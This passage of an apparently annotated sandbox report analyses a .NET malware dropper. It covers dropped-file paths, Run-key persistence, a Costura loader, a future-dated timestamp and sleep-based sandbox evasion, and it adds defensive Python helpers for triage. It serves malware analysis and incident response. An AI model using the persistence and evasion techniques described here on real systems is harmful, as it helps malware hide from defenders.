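        records.append(CodeView(uuid.UUID(bytes_le=raw_guid), age, path.decode("ascii")))
    return records


def classify_build_path(pdb_path: str) -> list:
    """Tag a PDB path by where it says the binary was built (heuristics, not proof)."""
    low = pdb_path.lower().replace("/", "\\")
    tags = []
    # GitHub-hosted Windows runners check the repository out at D:\a\<repo>\<repo>
    m = re.match(r"d:\\a\\([^\\]+)\\\1\\", low)
    if m:
        tags.append(f"github-actions-runner:{m.group(1)}")
    if "\\target\\" in low and "\\release\\deps\\" in low:
        tags.append("rust-cargo-target")
    if low.startswith("c:\\users\\"):
        tags.append("developer-profile")
    if low.startswith("c:\\programdata\\"):
        # A PDB path under ProgramData is the image's runtime location, not a build tree;
        # in memory dumps such strings usually come from the loader probing for symbols
        # next to the image rather than from the CodeView record.
        tags.append("runtime-location-not-build-dir")
    return tags


# Constructed test image: filler bytes plus two RSDS records using the PDB paths seen in
# the report. The GUIDs and ages are made up; the report does not show them.
SAMPLE_GUID = uuid.UUID("12345678-1234-5678-1234-56789abcdef0")
SAMPLE_GUID2 = uuid.UUID("0f0e0d0c-0b0a-0908-0706-050403020100")


def _record(guid: uuid.UUID, age: int, path: str) -> bytes:
    return b"RSDS" + guid.bytes_le + struct.pack("<I", age) + path.encode("ascii") + b"\x00"


SAMPLE_BLOB = (
    b"\x90" * 32
    + _record(SAMPLE_GUID, 1, "D:\\a\\bore\\bore\\target\\x86_64-pc-windows-msvc\\release\\deps\\bore.pdb")
    + b"\x00" * 16
    + _record(SAMPLE_GUID2, 3, "C:\\ProgramData\\uovan\\svrreve.PDB")
    + b"RSDS\x00\x00"  # truncated trailer: must be skipped, not crash the parser
)


if __name__ == "__main__":
    for rec in parse_rsds(SAMPLE_BLOB):
        print(rec.symbol_key, rec.pdb_path, classify_build_path(rec.pdb_path))
```

The symbol key is what you would put in a symbol-server request for the PDB, and the build-path tags are a quick way to separate a binary compiled on a CI runner from one built in a developer profile; both are pivots for clustering other samples from the same build pipeline.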

                          Data Obfuscation

                          Source: ubes6SC7Vd.exe, AssemblyLoader.cs .Net Code: ReadFromEmbeddedResources System.Reflection.Assembly.Load(byte[])
                          Source: Yara match File source: ubes6SC7Vd.exe, type: SAMPLE
                          Source: Yara match File source: 0.0.ubes6SC7Vd.exe.258f28f65d4.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara match File source: 0.0.ubes6SC7Vd.exe.258f28f0000.0.unpack, type: UNPACKEDPE
                          Source: Yara match File source: 00000009.00000002.2301901265.000001DD56A61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match File source: 0000000D.00000002.2276827527.000001B08F751000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match File source: 00000002.00000002.2289800804.0000026DC0DA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match File source: 00000000.00000002.1857818205.0000025880001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match File source: 00000000.00000000.1687370695.00000258F28F2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara match File source: Process Memory Space: ubes6SC7Vd.exe PID: 7268, type: MEMORYSTR
                          Source: Yara match File source: Process Memory Space: svrreve.exe PID: 7536, type: MEMORYSTR
                          Source: Yara match File source: Process Memory Space: svrreve.exe PID: 7924, type: MEMORYSTR
                          Source: Yara match File source: Process Memory Space: svrreve.exe PID: 8076, type: MEMORYSTR
                          Source: Yara match File source: C:\ProgramData\uovan\svrreve.exe, type: DROPPED
                          Source: ubes6SC7Vd.exe Static PE information: 0x95B82278 [Fri Aug 6 14:23:52 2049 UTC]
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exe Code function: 0_2_00007FFD9BA12C7A pushad ; iretd 0_2_00007FFD9BA12C7D
                          Source: C:\ProgramData\uovan\svrreve.exe Code function: 2_2_00007FFD9BA112D8 push cs; retn FDF8h 2_2_00007FFD9BA11472
                          Source: C:\ProgramData\uovan\svrreve.exe Code function: 2_2_00007FFD9BA12C7A pushad ; iretd 2_2_00007FFD9BA12C7D
                          Source: C:\ProgramData\uovan\svrreve.exe Code function: 9_2_00007FFD9B9F2C7A pushad ; iretd 9_2_00007FFD9B9F2C7D
                          Source: C:\ProgramData\uovan\svrreve.exe Code function: 13_2_00007FFD9BA02C7A pushad ; iretd 13_2_00007FFD9BA02C7D
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exe File created: C:\ProgramData\uovan\svrreve.exe
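The "suspicious time stamp" entry above decodes the COFF TimeDateStamp 0x95B82278 to a date in 2049. For a .NET assembly this is weaker evidence than it looks: the Costura loader in the same sample shows this is managed code, and .NET compilers in deterministic mode write a content hash into that field rather than a link time, so nonsense dates are routine. The added example below, written for this page and not taken from the report or the sample, parses the field from a PE header, checks for a CLR header in the data directory, and grades the finding accordingly; the minimal PE it builds and the observation date it uses are constructed for the demonstration.

```python
"""Decode IMAGE_FILE_HEADER.TimeDateStamp from a PE header and weigh how much a
'suspicious time stamp' is worth for this kind of binary.
Added example; not code from the report or from the sample."""
import struct
from datetime import datetime, timezone, timedelta

IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR = 14  # data-directory slot holding the CLR header
PE32_PLUS_MAGIC = 0x20B


def read_pe_header(data: bytes) -> dict:
    """Return the raw link timestamp and whether the image carries a CLR header."""
    if data[:2] != b"MZ":
        raise ValueError("no MZ header")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("no PE signature")
    coff = e_lfanew + 4
    # IMAGE_FILE_HEADER: Machine(2) NumberOfSections(2) TimeDateStamp(4) PointerToSymbolTable(4)
    #                    NumberOfSymbols(4) SizeOfOptionalHeader(2) Characteristics(2)
    (stamp,) = struct.unpack_from("<I", data, coff + 4)
    (size_of_optional,) = struct.unpack_from("<H", data, coff + 16)
    opt = coff + 20
    (magic,) = struct.unpack_from("<H", data, opt)
    # The data directory array starts at +112 in a PE32+ optional header, +96 in PE32.
    dirs = opt + (112 if magic == PE32_PLUS_MAGIC else 96)
    clr = dirs + 8 * IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
    is_dotnet = False
    if clr + 8 <= opt + size_of_optional:
        rva, size = struct.unpack_from("<II", data, clr)
        is_dotnet = rva != 0 and size != 0
    return {"stamp": stamp, "is_dotnet": is_dotnet}


def triage_timestamp(data: bytes, observed_iso: str, slack_days: int = 1) -> dict:
    """observed_iso: when the file was first seen (ISO 8601 with offset), e.g. the sandbox run.
    A stamp later than that, or a zero stamp, is flagged; for .NET images the verdict is
    downgraded because deterministic (Roslyn) builds store a content hash in this field."""
    hdr = read_pe_header(data)
    observed = datetime.fromisoformat(observed_iso)
    utc = datetime.fromtimestamp(hdr["stamp"], tz=timezone.utc)
    if hdr["stamp"] == 0:
        verdict = "zeroed"
    elif utc > observed + timedelta(days=slack_days):
        verdict = "future-dated"
    else:
        verdict = "plausible"
    if hdr["is_dotnet"] and verdict != "plausible":
        verdict += " (low signal: .NET image, field may be a deterministic-build hash)"
    return {"raw": hdr["stamp"], "utc": utc.isoformat(), "is_dotnet": hdr["is_dotnet"], "verdict": verdict}


def build_sample_pe(stamp: int, dotnet: bool) -> bytes:
    """Constructed minimal PE32+ header, not a real sample: 64-byte DOS header, PE signature,
    COFF header, and a 240-byte optional header with the CLR directory optionally populated."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)
    coff = struct.pack("<HHIIIHH", 0x8664, 1, stamp, 0, 0, 240, 0x22)
    opt = bytearray(240)
    struct.pack_into("<H", opt, 0, PE32_PLUS_MAGIC)
    if dotnet:
        struct.pack_into("<II", opt, 112 + 8 * IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR, 0x2008, 0x48)
    return bytes(dos) + b"PE\x00\x00" + coff + bytes(opt)


if __name__ == "__main__":
    # 0x95B82278 is the stamp the report shows for ubes6SC7Vd.exe; the observation date is assumed.
    print(triage_timestamp(build_sample_pe(0x95B82278, dotnet=True), "2024-06-26T00:00:00+00:00"))
```

On a real file, pass the first few kilobytes of the sample to triage_timestamp and the first-seen date from your own telemetry; the same decode applied to the dropped svrreve.exe (also managed, per the Costura match on the DROPPED file) should be read with the same .NET caveat.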

                          Boot Survival

                          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\whoami.exe whoami
                          Source: C:\ProgramData\uovan\svrreve.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Xohtsts
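The persistence above is a plain HKCU Run value (Xohtsts) written by the payload staged in C:\ProgramData, a directory any standard user can write to. The added example below, written for this page and not taken from the report or the sample, shows the triage a responder would run over exported Run values: expand environment variables, extract the launched image from a quoted or unquoted command line, and flag images living in user-writable locations or whose value name has nothing to do with the executable. The sample entries are constructed; that the Xohtsts value points at C:\ProgramData\uovan\svrreve.exe is an assumption, since the report shows the value name and the dropped file but not the value data.

```python
"""Triage autorun values of the kind the report shows (HKCU\\...\\Run, value Xohtsts):
resolve the image each value launches and flag ones living in user-writable directories.
Added example; not code from the report or from the sample."""
import ntpath
import re
from dataclasses import dataclass, field

# Lower-cased path fragments. ProgramData, Public and per-user profile directories are
# writable without elevation, which is why droppers stage their payload there.
USER_WRITABLE = ("c:\\programdata\\", "c:\\users\\public\\", "\\appdata\\", "\\temp\\")
SYSTEM_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")


@dataclass
class RunEntry:
    name: str
    command: str
    image: str = ""
    flags: list = field(default_factory=list)


def expand_env(command: str, env: dict) -> str:
    """Expand %VAR% the way the shell would; unknown variables are left untouched."""
    return re.sub(r"%([^%]+)%", lambda m: env.get(m.group(1).upper(), m.group(0)), command)


def image_from_command(command: str) -> str:
    """Pull the executable out of a Run value: a quoted path, or unquoted text up to the first .exe."""
    command = command.strip()
    if command.startswith('"'):
        close = command.find('"', 1)
        return command[1:close] if close != -1 else command[1:]
    m = re.match(r"(.+?\.exe)(?:\s|$)", command, re.IGNORECASE)
    return m.group(1) if m else command.split(" ", 1)[0]


def triage_run_entries(entries, env) -> list:
    results = []
    for name, command in entries:
        entry = RunEntry(name, command)
        entry.image = image_from_command(expand_env(command, env))
        low = entry.image.lower()
        if any(frag in low for frag in USER_WRITABLE):
            entry.flags.append("user-writable-location")
        elif not any(low.startswith(d) for d in SYSTEM_DIRS):
            entry.flags.append("unusual-location")
        # Weak heuristic: legitimate entries usually share a name stem with their executable.
        stem = ntpath.basename(low).split(".")[0]
        if stem not in name.lower() and name.lower() not in stem:
            entry.flags.append("name-unrelated-to-image")
        results.append(entry)
    return results


# Constructed inputs. The report shows the value name Xohtsts and the dropped file
# C:\ProgramData\uovan\svrreve.exe; that the value points at that file is an assumption.
SAMPLE_ENV = {"WINDIR": "C:\\Windows", "APPDATA": "C:\\Users\\user\\AppData\\Roaming"}
SAMPLE_ENTRIES = [
    ("Xohtsts", '"C:\\ProgramData\\uovan\\svrreve.exe"'),
    ("SecurityHealth", "%windir%\\system32\\SecurityHealthSystray.exe"),
    ("OneDrive", '"C:\\Users\\user\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe" /background'),
]

if __name__ == "__main__":
    for e in triage_run_entries(SAMPLE_ENTRIES, SAMPLE_ENV):
        print(f"{e.name:16} {e.image:60} {e.flags}")
```

On a live host the entries come from Get-ItemProperty on HKCU:\Software\Microsoft\Windows\CurrentVersion\Run (and the HKLM and RunOnce keys); the AppData flag will also hit legitimate per-user installers such as OneDrive, so treat the location flag as a prioritisation signal and pair it with the file's signature and prevalence before acting on it.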
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exe Process information set: NOOPENFILEERRORBOX (51 identical events)
                          Source: C:\ProgramData\uovan\svrreve.exe Process information set: NOOPENFILEERRORBOX (62 identical events)
                          Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\ProgramData\uovan\svrreve.exe Process information set: NOOPENFILEERRORBOX (26 identical events)
                          Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX (3 identical events)
                          Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX (43 identical events)
                          Source: C:\ProgramData\uovan\svrreve.exe Process information set: NOOPENFILEERRORBOX (26 identical events)
Source: C:\Windows\System32\WerFault.exe; Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX (8 identical rows)
Source: C:\Windows\System32\WerFault.exe; Process information set: NOOPENFILEERRORBOX (94 identical rows)
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe; Memory allocated: 258F2E10000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe; Memory allocated: 258F49B0000 memory reserve | memory write watch
Source: C:\ProgramData\uovan\svrreve.exe; Memory allocated: 26DBF3B0000 memory reserve | memory write watch
Source: C:\ProgramData\uovan\svrreve.exe; Memory allocated: 26DD8DA0000 memory reserve | memory write watch
Source: C:\ProgramData\uovan\svrreve.exe; Memory allocated: 26DF1840000 memory reserve | memory write watch
Source: C:\ProgramData\uovan\svrreve.exe; Memory allocated: 1DD550A0000 memory reserve | memory write watch
Source: C:\ProgramData\uovan\svrreve.exe; Memory allocated: 1DD6EA60000 memory reserve | memory write watch
Source: C:\ProgramData\uovan\svrreve.exe; Memory allocated: 1B08F620000 memory reserve | memory write watch
Source: C:\ProgramData\uovan\svrreve.exe; Memory allocated: 1B0A7750000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe; Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe; Thread delayed: delay time: 600000
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe; Thread delayed: delay time: 599891
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe; Thread delayed: delay time: 599781
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe; Thread delayed: delay time: 599672
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe; Thread delayed: delay time: 599562
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe; Thread delayed: delay time: 599445
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe; Thread delayed: delay time: 599342
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe; Thread delayed: delay time: 599235
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe; Thread delayed: delay time: 599085
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe; Thread delayed: delay time: 598914
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe; Thread delayed: delay time: 598809
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe; Thread delayed: delay time: 598702
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe; Thread delayed: delay time: 598594
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe; Thread delayed: delay time: 598469
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe; Thread delayed: delay time: 598360
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe; Thread delayed: delay time: 598235
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe; Thread delayed: delay time: 598110
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe; Thread delayed: delay time: 597985
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe; Thread delayed: delay time: 597860
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe; Thread delayed: delay time: 597735
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe; Thread delayed: delay time: 597610
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe; Thread delayed: delay time: 597485
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe; Thread delayed: delay time: 597360
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe; Thread delayed: delay time: 597235
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe; Thread delayed: delay time: 597110
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe; Thread delayed: delay time: 596985
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe; Thread delayed: delay time: 596860
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe; Thread delayed: delay time: 596735
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe; Thread delayed: delay time: 596610
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe; Thread delayed: delay time: 596485
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe; Thread delayed: delay time: 596360
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe; Thread delayed: delay time: 596172
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe; Thread delayed: delay time: 596054
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe; Thread delayed: delay time: 595918
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe; Thread delayed: delay time: 595812
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe; Thread delayed: delay time: 595704
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe; Thread delayed: delay time: 595579
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe; Thread delayed: delay time: 595454
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe; Thread delayed: delay time: 595329
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe; Thread delayed: delay time: 595219
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe; Thread delayed: delay time: 595094
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe; Thread delayed: delay time: 594985
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe; Thread delayed: delay time: 594860
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe; Thread delayed: delay time: 594735
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe; Thread delayed: delay time: 594610
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe; Thread delayed: delay time: 594485
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe; Thread delayed: delay time: 594360
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe; Thread delayed: delay time: 594235
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe; Thread delayed: delay time: 594061
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe; Thread delayed: delay time: 593954
Source: C:\ProgramData\uovan\svrreve.exe; Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\uovan\svrreve.exe; Thread delayed: delay time: 600000
Source: C:\ProgramData\uovan\svrreve.exe; Thread delayed: delay time: 599875
Source: C:\ProgramData\uovan\svrreve.exe; Thread delayed: delay time: 599765
Source: C:\ProgramData\uovan\svrreve.exe; Thread delayed: delay time: 599656
Source: C:\ProgramData\uovan\svrreve.exe; Thread delayed: delay time: 599547
Source: C:\ProgramData\uovan\svrreve.exe; Thread delayed: delay time: 599437
Source: C:\ProgramData\uovan\svrreve.exe; Thread delayed: delay time: 599328
Source: C:\ProgramData\uovan\svrreve.exe; Thread delayed: delay time: 599219
Source: C:\ProgramData\uovan\svrreve.exe; Thread delayed: delay time: 599094
Source: C:\ProgramData\uovan\svrreve.exe; Thread delayed: delay time: 598984
Source: C:\ProgramData\uovan\svrreve.exe; Thread delayed: delay time: 598875
Source: C:\ProgramData\uovan\svrreve.exe; Thread delayed: delay time: 598766
Source: C:\ProgramData\uovan\svrreve.exe; Thread delayed: delay time: 598656
Source: C:\ProgramData\uovan\svrreve.exe; Thread delayed: delay time: 598547
Source: C:\ProgramData\uovan\svrreve.exe; Thread delayed: delay time: 598438
Source: C:\ProgramData\uovan\svrreve.exe; Thread delayed: delay time: 598313
Source: C:\ProgramData\uovan\svrreve.exe; Thread delayed: delay time: 598188
Source: C:\ProgramData\uovan\svrreve.exe; Thread delayed: delay time: 598067
Source: C:\ProgramData\uovan\svrreve.exe; Thread delayed: delay time: 597942
Source: C:\ProgramData\uovan\svrreve.exe; Thread delayed: delay time: 597789
Source: C:\ProgramData\uovan\svrreve.exe; Thread delayed: delay time: 597684
Source: C:\ProgramData\uovan\svrreve.exe; Thread delayed: delay time: 597547
Source: C:\ProgramData\uovan\svrreve.exe; Thread delayed: delay time: 597390
Source: C:\ProgramData\uovan\svrreve.exe; Thread delayed: delay time: 597281
Source: C:\ProgramData\uovan\svrreve.exe; Thread delayed: delay time: 597172
Source: C:\ProgramData\uovan\svrreve.exe; Thread delayed: delay time: 597062
Source: C:\ProgramData\uovan\svrreve.exe; Thread delayed: delay time: 596953
Source: C:\ProgramData\uovan\svrreve.exe; Thread delayed: delay time: 596844
Source: C:\ProgramData\uovan\svrreve.exe; Thread delayed: delay time: 596734
Source: C:\ProgramData\uovan\svrreve.exe; Thread delayed: delay time: 596625
Source: C:\ProgramData\uovan\svrreve.exe; Thread delayed: delay time: 596516
Source: C:\ProgramData\uovan\svrreve.exe; Thread delayed: delay time: 596406
Source: C:\ProgramData\uovan\svrreve.exe; Thread delayed: delay time: 596297
Source: C:\ProgramData\uovan\svrreve.exe; Thread delayed: delay time: 596187
Source: C:\ProgramData\uovan\svrreve.exe; Thread delayed: delay time: 596078
Source: C:\ProgramData\uovan\svrreve.exe; Thread delayed: delay time: 595969
Source: C:\ProgramData\uovan\svrreve.exe; Thread delayed: delay time: 595859
Source: C:\ProgramData\uovan\svrreve.exe; Thread delayed: delay time: 595750
Source: C:\ProgramData\uovan\svrreve.exe; Thread delayed: delay time: 595641
Source: C:\ProgramData\uovan\svrreve.exe; Thread delayed: delay time: 595531
Source: C:\ProgramData\uovan\svrreve.exe; Thread delayed: delay time: 595422
Source: C:\ProgramData\uovan\svrreve.exe; Thread delayed: delay time: 595313
Source: C:\ProgramData\uovan\svrreve.exe; Thread delayed: delay time: 595203
Source: C:\ProgramData\uovan\svrreve.exe; Thread delayed: delay time: 595090
Source: C:\ProgramData\uovan\svrreve.exe; Thread delayed: delay time: 594977
Source: C:\ProgramData\uovan\svrreve.exe; Thread delayed: delay time: 594787
Source: C:\ProgramData\uovan\svrreve.exe; Thread delayed: delay time: 594625
Source: C:\ProgramData\uovan\svrreve.exe; Thread delayed: delay time: 594511
Source: C:\ProgramData\uovan\svrreve.exe; Thread delayed: delay time: 594406
Source: C:\ProgramData\uovan\svrreve.exe; Thread delayed: delay time: 594297
Source: C:\ProgramData\uovan\svrreve.exe; Thread delayed: delay time: 594187
Source: C:\ProgramData\uovan\svrreve.exe; Thread delayed: delay time: 594078
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe; Window / User API: threadDelayed 7645
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe; Window / User API: threadDelayed 2186
Source: C:\ProgramData\uovan\svrreve.exe; Window / User API: threadDelayed 7302
Source: C:\ProgramData\uovan\svrreve.exe; Window / User API: threadDelayed 2539
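The delay rows above can be triaged mechanically rather than read one by one. What follows is an added example, not part of the Joe Sandbox report or of the sample: it parses rows in this page's "Source: <process>; Thread delayed: delay time: <n>" shape (the sample rows in the block are constructed to match, and the WerFault row is there only to be skipped) and applies the report's own cut-offs, more than 30 sleeps per thread, a single sleep of 30000 ms or more, and the 3-minute "long sleep" signature. Two caveats it encodes: the value 922337203685477 is long.MaxValue / 10000, i.e. TimeSpan.MaxValue in milliseconds, so it is an indefinite .NET wait rather than a timed sleep and is kept out of the duration totals (the cumulative figure -30437127721620741 that the report prints for TID 7312 is exactly 33 of these added together, which is why that total says nothing about real dwell time); and the "Thread sleep time" rows are suffixed "s" but carry the same magnitudes as the millisecond delay rows, so they are read here as milliseconds.

```python
# Added triage helper, not part of the Joe Sandbox report or the sample: it parses
# "Thread delayed" rows in the form used on this page and applies the report's
# own thresholds (sleep count > 30, a single sleep >= 30000 ms, sleeps >= 3 min).
import re
from dataclasses import dataclass

# Constructed sample rows in the shape of this report; the WerFault row is
# deliberately unrelated so the parser has something to skip.
SAMPLE_ROWS = [
    r"Source: C:\Users\user\Desktop\ubes6SC7Vd.exe; Thread delayed: delay time: 922337203685477",
    r"Source: C:\Users\user\Desktop\ubes6SC7Vd.exe; Thread delayed: delay time: 600000",
    r"Source: C:\Users\user\Desktop\ubes6SC7Vd.exe; Thread delayed: delay time: 599891",
    r"Source: C:\ProgramData\uovan\svrreve.exe; Thread delayed: delay time: 600000",
    r"Source: C:\ProgramData\uovan\svrreve.exe; Thread delayed: delay time: 599875",
    r"Source: C:\Windows\System32\WerFault.exe; Process information set: NOOPENFILEERRORBOX",
]

ROW_RE = re.compile(
    r"^Source:\s*(?P<proc>[^;]+?);\s*Thread delayed: delay time:\s*(?P<ms>\d+)\s*$"
)

# long.MaxValue / 10_000 ticks: TimeSpan.MaxValue expressed in milliseconds. A .NET
# wait with this timeout is an indefinite wait, not a timed sleep, so it is counted
# separately and excluded from duration totals.
DOTNET_MAX_TIMESPAN_MS = (2**63 - 1) // 10_000     # 922337203685477
SINGLE_SLEEP_LIMIT_MS = 30_000                     # report: sleep time >= 30000
LONG_SLEEP_MS = 3 * 60 * 1000                      # report: long sleeps (>= 3 min)
SLEEP_COUNT_LIMIT = 30                             # report: sleep count > 30


@dataclass
class SleepProfile:
    process: str
    count: int = 0          # every delay row, indefinite waits included
    total_ms: int = 0       # timed sleeps only
    longest_ms: int = 0     # longest timed sleep
    indefinite: int = 0     # rows equal to TimeSpan.MaxValue


def parse_delays(rows):
    """Group delay rows by process; rows that are not 'Thread delayed' are skipped."""
    profiles = {}
    for row in rows:
        m = ROW_RE.match(row)
        if not m:
            continue
        proc, ms = m["proc"].strip(), int(m["ms"])
        p = profiles.setdefault(proc, SleepProfile(proc))
        p.count += 1
        if ms >= DOTNET_MAX_TIMESPAN_MS:
            p.indefinite += 1
            continue
        p.total_ms += ms
        p.longest_ms = max(p.longest_ms, ms)
    return profiles


def evasion_findings(profiles):
    """Return (process, finding) pairs using the same cut-offs the report applies."""
    findings = []
    for p in profiles.values():
        if p.indefinite:
            findings.append((p.process, "indefinite wait"))
        if p.longest_ms >= LONG_SLEEP_MS:
            findings.append((p.process, "long sleep (>= 3 min)"))
        elif p.longest_ms >= SINGLE_SLEEP_LIMIT_MS:
            findings.append((p.process, "sleep >= 30 s"))
        if p.count > SLEEP_COUNT_LIMIT:
            findings.append((p.process, "sleep loop (> 30 sleeps)"))
    return findings


def report(rows=SAMPLE_ROWS):
    """Human-readable summary; parse_delays/evasion_findings are what a pipeline calls."""
    profiles = parse_delays(rows)
    lines = []
    for p in profiles.values():
        lines.append(f"{p.process}: {p.count} sleeps, {p.total_ms} ms timed, "
                     f"longest {p.longest_ms} ms, {p.indefinite} indefinite")
    for proc, finding in evasion_findings(profiles):
        lines.append(f"  -> {proc}: {finding}")
    return "\n".join(lines)


if __name__ == "__main__":
    print(report())
```

Feeding the full row set from this page into parse_delays would push both processes past SLEEP_COUNT_LIMIT as well, matching the report's "sleep count > 30" rows; the five constructed rows only exercise the indefinite-wait and long-sleep branches.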
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe TID: 7312; Thread sleep count: 33 > 30
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe TID: 7312; Thread sleep time: -30437127721620741s >= -30000s
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe TID: 7312; Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe TID: 7312; Thread sleep time: -599891s >= -30000s
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe TID: 7412; Thread sleep count: 7645 > 30
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe TID: 7412; Thread sleep count: 2186 > 30
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe TID: 7312; Thread sleep time: -599781s >= -30000s
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe TID: 7312; Thread sleep time: -599672s >= -30000s
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe TID: 7312; Thread sleep time: -599562s >= -30000s
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe TID: 7312; Thread sleep time: -599445s >= -30000s
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe TID: 7312; Thread sleep time: -599342s >= -30000s
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe TID: 7312; Thread sleep time: -599235s >= -30000s
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe TID: 7312; Thread sleep time: -599085s >= -30000s
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe TID: 7312; Thread sleep time: -598914s >= -30000s
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe TID: 7312; Thread sleep time: -598809s >= -30000s
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe TID: 7312; Thread sleep time: -598702s >= -30000s
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe TID: 7312; Thread sleep time: -598594s >= -30000s
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe TID: 7312; Thread sleep time: -598469s >= -30000s
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe TID: 7312; Thread sleep time: -598360s >= -30000s
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe TID: 7312; Thread sleep time: -598235s >= -30000s
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe TID: 7312; Thread sleep time: -598110s >= -30000s
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe TID: 7312; Thread sleep time: -597985s >= -30000s
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe TID: 7312; Thread sleep time: -597860s >= -30000s
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe TID: 7312; Thread sleep time: -597735s >= -30000s
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe TID: 7312; Thread sleep time: -597610s >= -30000s
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe TID: 7312; Thread sleep time: -597485s >= -30000s
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe TID: 7312; Thread sleep time: -597360s >= -30000s
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe TID: 7312; Thread sleep time: -597235s >= -30000s
